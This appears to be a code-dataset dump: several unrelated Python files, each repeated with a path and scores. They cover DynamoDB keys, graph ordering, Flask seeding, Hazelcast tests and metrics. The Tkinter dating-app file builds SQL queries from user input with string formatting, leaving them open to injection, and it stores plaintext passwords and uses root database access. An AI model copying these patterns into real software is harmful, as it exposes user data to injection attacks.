class SortKey(EntityKey):
"""Sort key with a value."""
# Shouldn't inherit from `SortKey` as `PrefixSortKey` shouldn't pass where a
# `SortKey` is required.
class PrefixSortKey(EntityKey):
"""Prefix only sort key to query relations."""
def __init__(self, entity_name: Type[EntityName], value: str = ''):
"""Initialize a PrefixSortKey instance.
Args:
entity_name: The entity type name.
value: Optional prefix value.
"""
super().__init__(entity_name, value)
class PrimaryKey:
"""Primary (composite) key of a DynamoDB item."""
def __init__(self, partition_key: PartitionKey, sort_key: SortKey):
"""Initialize a PrimaryKey instance."""
super().__init__()
self._pk = partition_key
self._sk = sort_key
self._serializer = Serializer()
def __hash__(self) -> int:
return hash(self._tuple)
def __eq__(self, other: object) -> bool:
if isinstance(other, self.__class__):
return self._tuple == other._tuple
else:
return self._tuple == other
@property
def _tuple(self) -> Tuple[str, str]:
return str(self.partition_key), str(self.sort_key)
@property
def partition_key(self) -> PartitionKey: # pragma: no cover
"""Get the partition key."""
return self._pk
@property
def sort_key(self) -> SortKey: # pragma: no cover
"""Get the sort key."""
return self._sk
def serialize(self, global_index: GlobalIndex) -> Dict[str, Any]:
"""Serialize the primary key to a DynamoDB item.
Args:
global_index: The global index where this key will be used.
Returns:
The serialized key.
"""
pk_name = global_index.partition_key
sk_name = global_index.sort_key
item = {
pk_name: str(self.partition_key),
sk_name: str(self.sort_key)
}
return self._serializer.serialize_dict(item) | 0.952563 | 0.417509 |
from Queue import Queue
from domain import DomainUtils
from domain.ErrorTypes import ErrorTypes
from pipeline_generator.preprocessing.task import SpecialCaseHandler
# No need to keep data/state, so I did not make it a class..
# This will be safe for multi-thread use as well~
# Improve this...
def determine_generation_order(dependents_info, requireds_info, waiting_queue, special_edges):
error_code = ErrorTypes.NO_ERROR
if(special_edges is not None):
# Pass waiting queue in case any special cases needs to update it...
SpecialCaseHandler.update_dependents_and_requireds_for_special_cases(dependents_info, requireds_info, special_edges)
generation_order=[]
added_nodes=set()
# At this point, waiting queue has data-source and ModelLoad nodes.
while(not waiting_queue.empty()):
cur_node=waiting_queue.get()
if(cur_node not in added_nodes):
if((cur_node not in requireds_info) or (not bool(requireds_info[cur_node]))):
generation_order.append(cur_node)
added_nodes.add(cur_node)
__safe_delete(requireds_info, cur_node)
if(cur_node in dependents_info):
for dependent in dependents_info[cur_node]:
requireds_info[dependent].remove(cur_node)
waiting_queue.put(dependent)
__safe_delete(dependents_info, cur_node)
if(bool(requireds_info)):
# There must be a cycle if required_info still has elements at this moment
error_code = ErrorTypes.CYCLE_IN_GRAPH_ERROR
if(not bool(generation_order)):
error_code=ErrorTypes.EMPTY_GRAPH_ERROR
return generation_order, error_code
def preprocess_graph(graph):
dependents_info = {}
requireds_info = {}
waiting_queue = Queue()
for edge_id in graph["edges"]:
# Assuming directed edges such that first node is the source and the second node is the target.
node_ids = edge_id.split("-")
source_node_family = graph["nodes"][node_ids[0]]["family"]
__add_dependents_info(node_ids[0], node_ids[1], dependents_info)
__add_requireds_info(node_ids[1], node_ids[0], requireds_info)
# Nodes without incoming edges (requireds) will be processed first...
if(not DomainUtils.requires_incoming_edge(source_node_family)):
waiting_queue.put(node_ids[0])
return dependents_info, requireds_info, waiting_queue
def __add_dependents_info(current_node_id, dependent_node_id, dependents_info):
if (current_node_id not in dependents_info):
dependents_info[current_node_id] = set()
dependents_info[current_node_id].add(dependent_node_id)
def __add_requireds_info(current_node_id, required_node_id, requireds_info):
if (current_node_id not in requireds_info):
requireds_info[current_node_id] = set()
requireds_info[current_node_id].add(required_node_id)
def __safe_delete(dict, val):
if(val in dict):
del dict[val] | arakat-core/pipeline_generator/preprocessing/task/TaskPreprocessor.py | from Queue import Queue
from domain import DomainUtils
from domain.ErrorTypes import ErrorTypes
from pipeline_generator.preprocessing.task import SpecialCaseHandler
# No need to keep data/state, so I did not make it a class..
# This will be safe for multi-thread use as well~
# Improve this...
def determine_generation_order(dependents_info, requireds_info, waiting_queue, special_edges):
error_code = ErrorTypes.NO_ERROR
if(special_edges is not None):
# Pass waiting queue in case any special cases needs to update it...
SpecialCaseHandler.update_dependents_and_requireds_for_special_cases(dependents_info, requireds_info, special_edges)
generation_order=[]
added_nodes=set()
# At this point, waiting queue has data-source and ModelLoad nodes.
while(not waiting_queue.empty()):
cur_node=waiting_queue.get()
if(cur_node not in added_nodes):
if((cur_node not in requireds_info) or (not bool(requireds_info[cur_node]))):
generation_order.append(cur_node)
added_nodes.add(cur_node)
__safe_delete(requireds_info, cur_node)
if(cur_node in dependents_info):
for dependent in dependents_info[cur_node]:
requireds_info[dependent].remove(cur_node)
waiting_queue.put(dependent)
__safe_delete(dependents_info, cur_node)
if(bool(requireds_info)):
# There must be a cycle if required_info still has elements at this moment
error_code = ErrorTypes.CYCLE_IN_GRAPH_ERROR
if(not bool(generation_order)):
error_code=ErrorTypes.EMPTY_GRAPH_ERROR
return generation_order, error_code
def preprocess_graph(graph):
dependents_info = {}
requireds_info = {}
waiting_queue = Queue()
for edge_id in graph["edges"]:
# Assuming directed edges such that first node is the source and the second node is the target.
node_ids = edge_id.split("-")
source_node_family = graph["nodes"][node_ids[0]]["family"]
__add_dependents_info(node_ids[0], node_ids[1], dependents_info)
__add_requireds_info(node_ids[1], node_ids[0], requireds_info)
# Nodes without incoming edges (requireds) will be processed first...
if(not DomainUtils.requires_incoming_edge(source_node_family)):
waiting_queue.put(node_ids[0])
return dependents_info, requireds_info, waiting_queue
def __add_dependents_info(current_node_id, dependent_node_id, dependents_info):
if (current_node_id not in dependents_info):
dependents_info[current_node_id] = set()
dependents_info[current_node_id].add(dependent_node_id)
def __add_requireds_info(current_node_id, required_node_id, requireds_info):
if (current_node_id not in requireds_info):
requireds_info[current_node_id] = set()
requireds_info[current_node_id].add(required_node_id)
def __safe_delete(dict, val):
if(val in dict):
del dict[val] | 0.468304 | 0.18743 |
from app import db
from models import Community, Posts, Comments, User
db.create_all()
u = User(username="ben", password="<PASSWORD>")
c = Community(name="powerlifting", password=None, founder=u, FAQ=None, description=None)
post = Posts("How to Hook Grip with <NAME>",
"This is a video on how to hook grip with mark robb, https://www.youtube.com/watch?v=drGcGdSMeOg",
author=u,
community=c)
comment = Comments("Testing the new commenting feature!",
author=u,
post=post)
db.session.add_all([u, c, post, comment])
c = Community(name="Programming", password=None, founder=u, FAQ=None, description=None)
post = Posts("Rubber Ducky Code -- Intro to Flask",
"An intro to the flask microframework, made for those just finished with Learn Python the \
hard way and looking to get into web developement:: www.rubberduckycode.com",
author = u,
community = c)
post2 = Posts("Project Euler Solutions made in python",
"Project euler solutions made in python can be found here https://github.com/bendominguez011/Project-Euler-Solutions",
author=u,
community=c)
comment1 = Comments("Testing the new commenting feature!",
author=u,
post=post)
comment2 = Comments("Testing the new commenting feature!",
author=u,
post=post2)
db.session.add_all([c, post, post2, comment1, comment2])
c = Community("Anouncements",
password=None,
founder=u,
FAQ=None,
description=None)
post = Posts("Upcoming updates", "New updates soon to come:\
A Voting system, where you can thumb's up/thumb's down or dislike/like, dont know which yet.\n\
Authenticating with google, so that you could sign in easily through your google account, however this update may be delayed.\n\
Updated templating. I know the site currently looks terrible, but I plan on adding some more Javascript once I become more familiar with the language.\n",
author = u, community = c)
db.session.add_all([post, c])
db.session.commit() | db_create.py | from app import db
from models import Community, Posts, Comments, User
db.create_all()
u = User(username="ben", password="<PASSWORD>")
c = Community(name="powerlifting", password=None, founder=u, FAQ=None, description=None)
post = Posts("How to Hook Grip with <NAME>",
"This is a video on how to hook grip with mark robb, https://www.youtube.com/watch?v=drGcGdSMeOg",
author=u,
community=c)
comment = Comments("Testing the new commenting feature!",
author=u,
post=post)
db.session.add_all([u, c, post, comment])
c = Community(name="Programming", password=None, founder=u, FAQ=None, description=None)
post = Posts("Rubber Ducky Code -- Intro to Flask",
"An intro to the flask microframework, made for those just finished with Learn Python the \
hard way and looking to get into web developement:: www.rubberduckycode.com",
author = u,
community = c)
post2 = Posts("Project Euler Solutions made in python",
"Project euler solutions made in python can be found here https://github.com/bendominguez011/Project-Euler-Solutions",
author=u,
community=c)
comment1 = Comments("Testing the new commenting feature!",
author=u,
post=post)
comment2 = Comments("Testing the new commenting feature!",
author=u,
post=post2)
db.session.add_all([c, post, post2, comment1, comment2])
c = Community("Anouncements",
password=None,
founder=u,
FAQ=None,
description=None)
post = Posts("Upcoming updates", "New updates soon to come:\
A Voting system, where you can thumb's up/thumb's down or dislike/like, dont know which yet.\n\
Authenticating with google, so that you could sign in easily through your google account, however this update may be delayed.\n\
Updated templating. I know the site currently looks terrible, but I plan on adding some more Javascript once I become more familiar with the language.\n",
author = u, community = c)
db.session.add_all([post, c])
db.session.commit() | 0.431464 | 0.118487 |
from tkinter import *
import mysql.connector
class Tinder:
def __init__(self):
()#database connection
self.conn=mysql.connector.connect(host="localhost", user="root", password="", database="tinder")
self.mycursor=self.conn.cursor()
self.root=Tk()
self.root.title("TINDER")
self.root.minsize(600, 400)
self.root.maxsize(600, 400)
self.destroyWindow()
Label(text="Already a member!!!Log In Here!", fg="green").grid(row=0, column=0)
Label(text="Enter Email").grid(row=1,column=0)
self.emailInput=Entry()
self.emailInput.grid(row=1,column=1)
Label(text="Enter Password").grid(row=2,column=0)
self.passwordInput=Entry()
self.passwordInput.grid(row=2,column=1)
Button(text="Login", command=lambda : self.login()).grid(row=3,column=0)
self.message=Label(text="", fg="red")
self.message.grid(row=4,column=0)
Label(text="Not a member?Register here!", fg="green").grid(row=5,column=0)
Button(text="Register Here", command=lambda : self.launchRegWindow()).grid(row=6,column=0)
self.root.mainloop()
def login(self):
self.mycursor.execute("""SELECT * FROM `user` WHERE `email` LIKE '{}' AND `password` LIKE '{}'""".format(self.emailInput.get(),self.passwordInput.get()))
response = self.mycursor.fetchall()
if len(response)>0:
self.message.configure(text="Welcome User")
Label(text="For user menu Click Here!!", fg="blue").grid(row=8,column=0)
Button(text="User Menu", command=lambda : self.launchUserMenu()).grid(row=9,column=0)
Label(text="To Log Out Click Here!!", fg="blue").grid(row=10, column=0)
Button(text="LOG OUT", command=lambda : self.launchLogOut()).grid(row=11, column=0)
self.current_user_id = response[0][0]
else:
self.message.configure(text="Incorrect email/password")
def launchRegWindow(self):
self.destroyWindow()
Label(text="Register").grid(row=0,column=0)
self.conn = mysql.connector.connect(host="localhost", user="root", password="", database="tinder")
self.mycursor = self.conn.cursor()
Label(text="Full Name").grid(row=1,column=0)
self.nameReg = Entry()
self.nameReg.grid(row=1,column=1)
Label(text="Provide Email").grid(row=2,column=0)
self.emailReg = Entry()
self.emailReg.grid(row=2,column=1)
Label(text="Provide Password").grid(row=3,column=0)
self.passwordReg = Entry()
self.passwordReg.grid(row=3,column=1)
Label(text="Provide Gender").grid(row=4,column=0)
self.genderReg = Entry()
self.genderReg.grid(row=4,column=1)
Label(text="Provide Age").grid(row=5,column=0)
self.ageReg = Entry()
self.ageReg.grid(row=5,column=1)
Label(text="Provide City").grid(row=6,column=0)
self.cityReg = Entry()
self.cityReg.grid(row=6,column=1)
Label(text="Provide hobbies").grid(row=7,column=0)
self.hobbiesReg = Entry()
self.hobbiesReg.grid(row=7,column=1)
Button(self.root, text="Register", command=lambda : self.register()).grid(row=8,column=0)
self.message = Label(text="", fg="red")
self.message.grid(row=9,column=0)
self.root.mainloop()
def register(self):
self.mycursor.execute("""INSERT INTO `user` (`user_id`, `name`, `email`, `password`, `gender`, `age`, `city`, `hobbies`) VALUES
(NULL, '{}', '{}', '{}', '{}', '{}', '{}', '{}')""".format(self.nameReg.get(),
self.emailReg.get(),
self.passwordReg.get(),
self.genderReg.get(),
self.ageReg.get(),
self.cityReg.get(),
self.hobbiesReg.get()))
self.conn.commit()
self.message.configure(text="Registration Successful")
Label(text="To Log Out Click Here!!", fg="blue").grid(row=10, column=0)
Button(text="LOG OUT", command=lambda: self.launchLogOut()).grid(row=11, column=0)
def launchUserMenu(self):
self.destroyWindow()
Label(text="User Menu").grid(row=0, column=0)
Label(text="To view all users Click Here!!", fg="blue").grid(row=1, column=0)
Button(text="View Users", command=lambda : self.launchViewUsers()).grid(row=2, column=0)
Label(text="To view whom you have proposed Click Here!!", fg="blue").grid(row=3, column=0)
Button(text="Proposed Users", command=lambda : self.launchProposedUsers()).grid(row=4, column=0)
Label(text="To view who have proposed you Click Here!!", fg="blue").grid(row=5, column=0)
Button(text="Proposals", command=lambda : self.launchProposals()).grid(row=6, column=0)
Label(text="To view all matches Click Here!!", fg="blue").grid(row=7, column=0)
Button(text="Matches", command=lambda : self.launchMatches()).grid(row=8, column=0)
Label(text="To Log Out Click Here!!", fg="blue").grid(row=9, column=0)
Button(text="LOG OUT", command=lambda: self.launchLogOut()).grid(row=10, column=0)
self.sb1 = Scrollbar()
self.sb1.grid(row=0, column=1, rowspan=5)
self.list1 = Listbox(height=7, width=40)
self.list1.grid(row=0, column=2, rowspan=6, columnspan=4)
self.list1.configure(yscrollcommand=self.sb1.set)
self.sb1.configure(command=self.list1.yview)
self.entry_value = StringVar()
def launchViewUsers(self, i=0):
self.list1.delete(0, END)
self.view_users()
for i in self.all_users_list:
self.list1.insert(END, i)
Label(text="enter the id of the user whom you would like to propose:", fg="blue").grid(row=12,column=0)
self.juliet_id = Entry()
self.juliet_id.grid(row=13, column=0)
Button(text="Propose", command=lambda: self.propose()).grid(row=14, column=0)
def propose(self):
self.mycursor.execute(
"""INSERT INTO `proposals` (`proposal_id`, `romeo_id`, `juliet_id`) VALUES (NULL, '{}', '{}')"""
.format(self.current_user_id, self.juliet_id.get()))
self.conn.commit()
Label(text="Proposal sent successfully! Fingers crossed!", fg="green").grid(row=15,column=0)
self.launchViewUsers()
def view_users(self):
self.mycursor.execute(
"""SELECT `user_id`,`name`,`gender`,`age`,`city`,`hobbies` FROM `user` WHERE `user_id` NOT LIKE '{}'""".format(
self.current_user_id))
self.all_users_list = self.mycursor.fetchall()
def launchProposedUsers(self):
self.list1.delete(0, END)
self.view_proposed()
for i in self.proposed_user_list:
self.list1.insert(END, i)
def view_proposed(self):
self.mycursor.execute(
"""SELECT u.`name`,u.`gender`,u.`city`,u.`age`,u.`hobbies` FROM `proposals` p JOIN `user` u ON p.`juliet_id` = u.`user_id`
WHERE p.`romeo_id` LIKE '{}'""".format(self.current_user_id))
self.proposed_user_list = self.mycursor.fetchall()
def launchProposals(self):
self.list1.delete(0, END)
self.view_requests()
for i in self.request_user_list:
self.list1.insert(END, i)
def view_requests(self):
self.mycursor.execute(
"""SELECT u.`name`,u.`gender`,u.`city`,u.`age`,u.`hobbies` FROM `proposals` p JOIN `user` u ON p.`romeo_id` = u.`user_id`
WHERE p.`juliet_id` LIKE '{}'""".format(self.current_user_id))
self.request_user_list = self.mycursor.fetchall()
def launchMatches(self):
self.list1.delete(0, END)
self.view_matches()
for i in self.matched_user:
self.list1.insert(END, i)
def view_matches(self):
# tripple subquery
self.mycursor.execute(
"""SELECT `name`,`gender`,`age`,`city`,`hobbies` FROM `user` WHERE `user_id` IN
(SELECT `juliet_id` FROM `proposals` WHERE `romeo_id` LIKE '{}' AND `juliet_id` IN (SELECT `romeo_id` FROM `proposals`
WHERE `juliet_id` LIKE '{}'))""".format(self.current_user_id, self.current_user_id))
self.matched_user = self.mycursor.fetchall()
def launchLogOut(self):
self.destroyWindow()
self.current_user_id = 0
Label(text="!!Logged out successfully!!", fg="red").grid(row=0,column=0)
Label(text="Already a member!!!Log In Here!", fg="green").grid(row=1, column=0)
Label(text="Enter Email").grid(row=2, column=0)
self.emailInput = Entry()
self.emailInput.grid(row=2, column=1)
Label(text="Enter Password").grid(row=3, column=0)
self.passwordInput = Entry()
self.passwordInput.grid(row=3, column=1)
Button(text="Login", command=lambda: self.login()).grid(row=4, column=0)
self.message = Label(text="", fg="red")
self.message.grid(row=5, column=0)
Label(text="Not a member?Register here!", fg="green").grid(row=6, column=0)
Button(text="Register Here", command=lambda: self.launchRegWindow()).grid(row=7, column=0)
self.root.mainloop()
def destroyWindow(self):
for i in self.root.grid_slaves():
i.destroy()
obj=Tinder() | Python3 GUI code.py | from tkinter import *
import mysql.connector
class Tinder:
def __init__(self):
()#database connection
self.conn=mysql.connector.connect(host="localhost", user="root", password="", database="tinder")
self.mycursor=self.conn.cursor()
self.root=Tk()
self.root.title("TINDER")
self.root.minsize(600, 400)
self.root.maxsize(600, 400)
self.destroyWindow()
Label(text="Already a member!!!Log In Here!", fg="green").grid(row=0, column=0)
Label(text="Enter Email").grid(row=1,column=0)
self.emailInput=Entry()
self.emailInput.grid(row=1,column=1)
Label(text="Enter Password").grid(row=2,column=0)
self.passwordInput=Entry()
self.passwordInput.grid(row=2,column=1)
Button(text="Login", command=lambda : self.login()).grid(row=3,column=0)
self.message=Label(text="", fg="red")
self.message.grid(row=4,column=0)
Label(text="Not a member?Register here!", fg="green").grid(row=5,column=0)
Button(text="Register Here", command=lambda : self.launchRegWindow()).grid(row=6,column=0)
self.root.mainloop()
def login(self):
self.mycursor.execute("""SELECT * FROM `user` WHERE `email` LIKE '{}' AND `password` LIKE '{}'""".format(self.emailInput.get(),self.passwordInput.get()))
response = self.mycursor.fetchall()
if len(response)>0:
self.message.configure(text="Welcome User")
Label(text="For user menu Click Here!!", fg="blue").grid(row=8,column=0)
Button(text="User Menu", command=lambda : self.launchUserMenu()).grid(row=9,column=0)
Label(text="To Log Out Click Here!!", fg="blue").grid(row=10, column=0)
Button(text="LOG OUT", command=lambda : self.launchLogOut()).grid(row=11, column=0)
self.current_user_id = response[0][0]
else:
self.message.configure(text="Incorrect email/password")
def launchRegWindow(self):
self.destroyWindow()
Label(text="Register").grid(row=0,column=0)
self.conn = mysql.connector.connect(host="localhost", user="root", password="", database="tinder")
self.mycursor = self.conn.cursor()
Label(text="Full Name").grid(row=1,column=0)
self.nameReg = Entry()
self.nameReg.grid(row=1,column=1)
Label(text="Provide Email").grid(row=2,column=0)
self.emailReg = Entry()
self.emailReg.grid(row=2,column=1)
Label(text="Provide Password").grid(row=3,column=0)
self.passwordReg = Entry()
self.passwordReg.grid(row=3,column=1)
Label(text="Provide Gender").grid(row=4,column=0)
self.genderReg = Entry()
self.genderReg.grid(row=4,column=1)
Label(text="Provide Age").grid(row=5,column=0)
self.ageReg = Entry()
self.ageReg.grid(row=5,column=1)
Label(text="Provide City").grid(row=6,column=0)
self.cityReg = Entry()
self.cityReg.grid(row=6,column=1)
Label(text="Provide hobbies").grid(row=7,column=0)
self.hobbiesReg = Entry()
self.hobbiesReg.grid(row=7,column=1)
Button(self.root, text="Register", command=lambda : self.register()).grid(row=8,column=0)
self.message = Label(text="", fg="red")
self.message.grid(row=9,column=0)
self.root.mainloop()
def register(self):
self.mycursor.execute("""INSERT INTO `user` (`user_id`, `name`, `email`, `password`, `gender`, `age`, `city`, `hobbies`) VALUES
(NULL, '{}', '{}', '{}', '{}', '{}', '{}', '{}')""".format(self.nameReg.get(),
self.emailReg.get(),
self.passwordReg.get(),
self.genderReg.get(),
self.ageReg.get(),
self.cityReg.get(),
self.hobbiesReg.get()))
self.conn.commit()
self.message.configure(text="Registration Successful")
Label(text="To Log Out Click Here!!", fg="blue").grid(row=10, column=0)
Button(text="LOG OUT", command=lambda: self.launchLogOut()).grid(row=11, column=0)
def launchUserMenu(self):
self.destroyWindow()
Label(text="User Menu").grid(row=0, column=0)
Label(text="To view all users Click Here!!", fg="blue").grid(row=1, column=0)
Button(text="View Users", command=lambda : self.launchViewUsers()).grid(row=2, column=0)
Label(text="To view whom you have proposed Click Here!!", fg="blue").grid(row=3, column=0)
Button(text="Proposed Users", command=lambda : self.launchProposedUsers()).grid(row=4, column=0)
Label(text="To view who have proposed you Click Here!!", fg="blue").grid(row=5, column=0)
Button(text="Proposals", command=lambda : self.launchProposals()).grid(row=6, column=0)
Label(text="To view all matches Click Here!!", fg="blue").grid(row=7, column=0)
Button(text="Matches", command=lambda : self.launchMatches()).grid(row=8, column=0)
Label(text="To Log Out Click Here!!", fg="blue").grid(row=9, column=0)
Button(text="LOG OUT", command=lambda: self.launchLogOut()).grid(row=10, column=0)
self.sb1 = Scrollbar()
self.sb1.grid(row=0, column=1, rowspan=5)
self.list1 = Listbox(height=7, width=40)
self.list1.grid(row=0, column=2, rowspan=6, columnspan=4)
self.list1.configure(yscrollcommand=self.sb1.set)
self.sb1.configure(command=self.list1.yview)
self.entry_value = StringVar()
def launchViewUsers(self, i=0):
self.list1.delete(0, END)
self.view_users()
for i in self.all_users_list:
self.list1.insert(END, i)
Label(text="enter the id of the user whom you would like to propose:", fg="blue").grid(row=12,column=0)
self.juliet_id = Entry()
self.juliet_id.grid(row=13, column=0)
Button(text="Propose", command=lambda: self.propose()).grid(row=14, column=0)
def propose(self):
self.mycursor.execute(
"""INSERT INTO `proposals` (`proposal_id`, `romeo_id`, `juliet_id`) VALUES (NULL, '{}', '{}')"""
.format(self.current_user_id, self.juliet_id.get()))
self.conn.commit()
Label(text="Proposal sent successfully! Fingers crossed!", fg="green").grid(row=15,column=0)
self.launchViewUsers()
def view_users(self):
self.mycursor.execute(
"""SELECT `user_id`,`name`,`gender`,`age`,`city`,`hobbies` FROM `user` WHERE `user_id` NOT LIKE '{}'""".format(
self.current_user_id))
self.all_users_list = self.mycursor.fetchall()
def launchProposedUsers(self):
self.list1.delete(0, END)
self.view_proposed()
for i in self.proposed_user_list:
self.list1.insert(END, i)
def view_proposed(self):
self.mycursor.execute(
"""SELECT u.`name`,u.`gender`,u.`city`,u.`age`,u.`hobbies` FROM `proposals` p JOIN `user` u ON p.`juliet_id` = u.`user_id`
WHERE p.`romeo_id` LIKE '{}'""".format(self.current_user_id))
self.proposed_user_list = self.mycursor.fetchall()
def launchProposals(self):
self.list1.delete(0, END)
self.view_requests()
for i in self.request_user_list:
self.list1.insert(END, i)
def view_requests(self):
self.mycursor.execute(
"""SELECT u.`name`,u.`gender`,u.`city`,u.`age`,u.`hobbies` FROM `proposals` p JOIN `user` u ON p.`romeo_id` = u.`user_id`
WHERE p.`juliet_id` LIKE '{}'""".format(self.current_user_id))
self.request_user_list = self.mycursor.fetchall()
def launchMatches(self):
self.list1.delete(0, END)
self.view_matches()
for i in self.matched_user:
self.list1.insert(END, i)
def view_matches(self):
# tripple subquery
self.mycursor.execute(
"""SELECT `name`,`gender`,`age`,`city`,`hobbies` FROM `user` WHERE `user_id` IN
(SELECT `juliet_id` FROM `proposals` WHERE `romeo_id` LIKE '{}' AND `juliet_id` IN (SELECT `romeo_id` FROM `proposals`
WHERE `juliet_id` LIKE '{}'))""".format(self.current_user_id, self.current_user_id))
self.matched_user = self.mycursor.fetchall()
def launchLogOut(self):
self.destroyWindow()
self.current_user_id = 0
Label(text="!!Logged out successfully!!", fg="red").grid(row=0,column=0)
Label(text="Already a member!!!Log In Here!", fg="green").grid(row=1, column=0)
Label(text="Enter Email").grid(row=2, column=0)
self.emailInput = Entry()
self.emailInput.grid(row=2, column=1)
Label(text="Enter Password").grid(row=3, column=0)
self.passwordInput = Entry()
self.passwordInput.grid(row=3, column=1)
Button(text="Login", command=lambda: self.login()).grid(row=4, column=0)
self.message = Label(text="", fg="red")
self.message.grid(row=5, column=0)
Label(text="Not a member?Register here!", fg="green").grid(row=6, column=0)
Button(text="Register Here", command=lambda: self.launchRegWindow()).grid(row=7, column=0)
self.root.mainloop()
def destroyWindow(self):
for i in self.root.grid_slaves():
i.destroy()
obj=Tinder() | 0.394667 | 0.117066 |
from unittest import TestCase
from hazelcast import six
from hazelcast.core import Address
from hazelcast.connection import DefaultAddressProvider
class DefaultAddressProviderTest(TestCase):
def test_load_addresses(self):
initial_list = ["192.168.0.1:5701"]
provider = DefaultAddressProvider(initial_list)
primaries, secondaries = provider.load_addresses()
six.assertCountEqual(self, primaries, [Address("192.168.0.1", 5701)])
six.assertCountEqual(self, secondaries, [])
def test_load_addresses_with_multiple_addresses(self):
initial_list = ["192.168.0.1:5701", "192.168.0.1:5702", "192.168.0.2:5701"]
provider = DefaultAddressProvider(initial_list)
primaries, secondaries = provider.load_addresses()
six.assertCountEqual(
self,
primaries,
[
Address("192.168.0.1", 5701),
Address("192.168.0.1", 5702),
Address("192.168.0.2", 5701),
],
)
six.assertCountEqual(self, secondaries, [])
# we deal with duplicate addresses in the ConnectionManager#_get_possible_addresses
def test_load_addresses_with_duplicate_addresses(self):
initial_list = ["192.168.0.1:5701", "192.168.0.1:5701"]
provider = DefaultAddressProvider(initial_list)
primaries, secondaries = provider.load_addresses()
six.assertCountEqual(
self, primaries, [Address("192.168.0.1", 5701), Address("192.168.0.1", 5701)]
)
six.assertCountEqual(self, secondaries, [])
def test_load_addresses_with_empty_addresses(self):
initial_list = []
provider = DefaultAddressProvider(initial_list)
primaries, secondaries = provider.load_addresses()
six.assertCountEqual(self, primaries, [Address("127.0.0.1", 5701)])
six.assertCountEqual(
self, secondaries, [Address("127.0.0.1", 5702), Address("127.0.0.1", 5703)]
)
def test_load_addresses_without_port(self):
initial_list = ["192.168.0.1"]
provider = DefaultAddressProvider(initial_list)
primaries, secondaries = provider.load_addresses()
six.assertCountEqual(self, primaries, [Address("192.168.0.1", 5701)])
six.assertCountEqual(
self, secondaries, [Address("192.168.0.1", 5702), Address("192.168.0.1", 5703)]
)
def test_translate(self):
provider = DefaultAddressProvider([])
address = Address("192.168.0.1", 5701)
actual = provider.translate(address)
self.assertEqual(address, actual)
def test_translate_none(self):
provider = DefaultAddressProvider([])
actual = provider.translate(None)
self.assertIsNone(actual) | tests/unit/discovery/default_address_provider_test.py | from unittest import TestCase
from hazelcast import six
from hazelcast.core import Address
from hazelcast.connection import DefaultAddressProvider
class DefaultAddressProviderTest(TestCase):
def test_load_addresses(self):
initial_list = ["192.168.0.1:5701"]
provider = DefaultAddressProvider(initial_list)
primaries, secondaries = provider.load_addresses()
six.assertCountEqual(self, primaries, [Address("192.168.0.1", 5701)])
six.assertCountEqual(self, secondaries, [])
def test_load_addresses_with_multiple_addresses(self):
initial_list = ["192.168.0.1:5701", "192.168.0.1:5702", "192.168.0.2:5701"]
provider = DefaultAddressProvider(initial_list)
primaries, secondaries = provider.load_addresses()
six.assertCountEqual(
self,
primaries,
[
Address("192.168.0.1", 5701),
Address("192.168.0.1", 5702),
Address("192.168.0.2", 5701),
],
)
six.assertCountEqual(self, secondaries, [])
# we deal with duplicate addresses in the ConnectionManager#_get_possible_addresses
def test_load_addresses_with_duplicate_addresses(self):
initial_list = ["192.168.0.1:5701", "192.168.0.1:5701"]
provider = DefaultAddressProvider(initial_list)
primaries, secondaries = provider.load_addresses()
six.assertCountEqual(
self, primaries, [Address("192.168.0.1", 5701), Address("192.168.0.1", 5701)]
)
six.assertCountEqual(self, secondaries, [])
def test_load_addresses_with_empty_addresses(self):
initial_list = []
provider = DefaultAddressProvider(initial_list)
primaries, secondaries = provider.load_addresses()
six.assertCountEqual(self, primaries, [Address("127.0.0.1", 5701)])
six.assertCountEqual(
self, secondaries, [Address("127.0.0.1", 5702), Address("127.0.0.1", 5703)]
)
def test_load_addresses_without_port(self):
initial_list = ["192.168.0.1"]
provider = DefaultAddressProvider(initial_list)
primaries, secondaries = provider.load_addresses()
six.assertCountEqual(self, primaries, [Address("192.168.0.1", 5701)])
six.assertCountEqual(
self, secondaries, [Address("192.168.0.1", 5702), Address("192.168.0.1", 5703)]
)
def test_translate(self):
provider = DefaultAddressProvider([])
address = Address("192.168.0.1", 5701)
actual = provider.translate(address)
self.assertEqual(address, actual)
def test_translate_none(self):
provider = DefaultAddressProvider([])
actual = provider.translate(None)
self.assertIsNone(actual) | 0.807688 | 0.469824 |
import os
from os.path import join as jp
from collections import defaultdict
from tqdm import tqdm
import numpy as np
import pandas as pd
from skimage.measure import label
from dpipe.io import load_json, save_json, load_pred
from dpipe.medim.metrics import dice_score, fraction
from dpipe.commands import load_from_folder
from lowres.utils import get_pred, volume2diameter, np_sigmoid
def get_intersection_stat_dice_id(cc_mask, one_cc, pred=None, logit=None):
    """Return the stats of the best-overlapping component, its dice and its id.

    ``cc_mask`` is a labelled component map and ``one_cc`` a boolean mask of a
    single component.  If ``pred`` is ``None``, ``cc_mask`` is treated as the
    ground truth and every probability stat is reported as 1.
    """
    # Labels of the components in ``cc_mask`` that overlap ``one_cc``
    # (label 0 is background and is discarded).
    overlapping = np.unique(cc_mask[one_cc])
    overlapping = overlapping[overlapping != 0]

    stat_keys = ['hit_max', 'hit_median', 'hit_q95', 'hit_logit']
    hit_stats = {key: [] for key in stat_keys}
    hit_dice, hit_id = [], []

    for component in overlapping:
        component_mask = cc_mask == component
        hit_dice.append(dice_score(component_mask, one_cc))
        hit_id.append(component)
        hit_stats['hit_max'].append(1. if pred is None else np.max(pred[component_mask]))
        hit_stats['hit_median'].append(1. if pred is None else np.median(pred[component_mask]))
        hit_stats['hit_q95'].append(1. if pred is None else np.percentile(pred[component_mask], q=95))
        hit_stats['hit_logit'].append(np.inf if logit is None else np.max(logit[component_mask]))

    if not hit_dice:
        # Nothing overlaps: zero stats, -inf logit, no hit id.
        return dict(zip(stat_keys, [0., 0., 0., -np.inf])), 0., None

    # Keep the stats of the component with the highest local dice.
    best = np.argmax(hit_dice)
    for key in stat_keys:
        hit_stats[key] = np.array(hit_stats[key])[best]
    return hit_stats, np.max(hit_dice), np.array(hit_id)[best]
def _make_record(obj, is_tum, cc, stats, dice, hit_id, hit_prefix, self_stat, self_logit):
    """Build one per-component record; shared by the target and prediction loops.

    Accessing ``stats`` by key (rather than unpacking ``stats.values()``)
    avoids depending on dict insertion order.
    """
    return {
        'obj': obj,
        'is_tum': is_tum,
        'diameter': volume2diameter(np.sum(cc)),
        'hit_dice': dice,
        'hit_max': stats['hit_max'],
        'hit_median': stats['hit_median'],
        'hit_q95': stats['hit_q95'],
        'hit_logit': stats['hit_logit'],
        'hit_stat': stats['hit_max'],  # backward compatibility
